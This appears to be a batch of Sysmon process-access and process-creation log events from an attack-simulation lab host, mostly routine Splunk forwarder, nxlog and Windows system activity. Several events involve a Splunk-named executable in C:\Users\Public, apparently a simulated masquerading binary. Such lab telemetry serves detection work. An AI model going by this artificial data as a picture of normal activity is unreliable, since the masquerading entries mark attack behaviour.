{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.246\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.246","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nProcessGuid: {E2A3D6B1-10B2-5F25-0000-001047F00400}\r\nProcessId: 4560\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","ProcessGuid":"{E2A3D6B1-10B2-5F25-0000-001047F00400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10B2-5F25-0000-001047F00400}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10B2-5F25-0000-001047F00400}","TargetProcessId":"4560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10B2-5F25-0000-001047F00400}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10B2-5F25-0000-001047F00400}","TargetProcessId":"4560","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:26.262\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:26.262","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
